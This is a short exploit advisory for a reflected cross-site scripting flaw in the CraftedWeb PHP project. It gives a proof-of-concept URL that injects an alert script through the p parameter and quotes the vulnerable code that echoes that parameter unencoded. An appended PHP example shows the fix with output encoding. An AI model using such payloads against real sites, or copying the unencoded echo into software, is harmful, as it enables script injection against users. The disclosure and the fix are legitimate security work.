CraftedWeb Cross Site Scripting

2015.10.12
Credit: M.r00t3x
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: CraftedWeb Cross Site Scripting
# Google Dork: NA
# Date: 2015-10-06
# Exploit Author: M.r00t3x
# Vendor Homepage: https://github.com/zze/CraftedWeb
# Software Link: https://codeload.github.com/zze/CraftedWeb/zip/master
# Tested on: Windows xp

reflected Xss

http://127.0.0.1/CraftedWeb-master/index.php?p=</title>1<ScRiPt>alert('xss')</ScRiPt>

source :

    echo $website_title .' - ';
    while ($page_title = current($GLOBALS['core_pages'])) {
        if ($page_title == $_GET['p'].'.php') {
            echo key($GLOBALS['core_pages']);
            $foundPT = true;
        }
        next($GLOBALS['core_pages']);
    }
    if(!isset($foundPT))
        echo ucfirst($_GET['p']);

facebook page : wwww.fb.com/algeria.anon
Thanks : M.tucX - MrDz -MadGuko
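The fallback branch in the source above, `echo ucfirst($_GET['p'])`, writes the request parameter into the page title without output encoding. The following is an added example, not code from CraftedWeb or from the advisory's author, showing the same title logic with encoding applied at output; the helper names `h` and `page_title` and the sample `$core_pages` entries are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the title logic quoted in the advisory.
// Helper names and sample data are hypothetical, not taken from CraftedWeb.

function h(string $s): string
{
    // Encode for an HTML text context; ENT_QUOTES also covers quoted attributes.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function page_title(string $website_title, array $core_pages, $p): string
{
    // ?p[]=x arrives as an array; treat anything that is not a string as absent.
    if (!is_string($p)) {
        $p = '';
    }

    // Same lookup as the original loop: values are file names, keys are titles.
    $known = array_search($p . '.php', $core_pages, true);

    $title = ($known !== false) ? (string) $known : ucfirst($p);

    // Encode every piece at output, including the fallback branch that
    // previously echoed $_GET['p'] raw.
    return h($website_title) . ' - ' . h($title);
}

// Constructed sample data; the key => file name shape is inferred from the loop.
$website_title = 'CraftedWeb';
$core_pages = ['Home' => 'home.php', 'Account Panel' => 'account.php'];

// Value of p from the advisory's proof-of-concept URL.
$payload = "</title>1<ScRiPt>alert('xss')</ScRiPt>";

// Known page, unknown page, the PoC value, and an array-typed parameter.
foreach (['home', 'news', $payload, ['x']] as $p) {
    echo '<title>' . page_title($website_title, $core_pages, $p) . "</title>\n";
}
```

In the application itself the third argument would be `$_GET['p'] ?? ''`; with encoding in place the PoC value is rendered as inert text inside the title element instead of closing it.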

References:

https://codeload.github.com/zze/CraftedWeb/zip/master

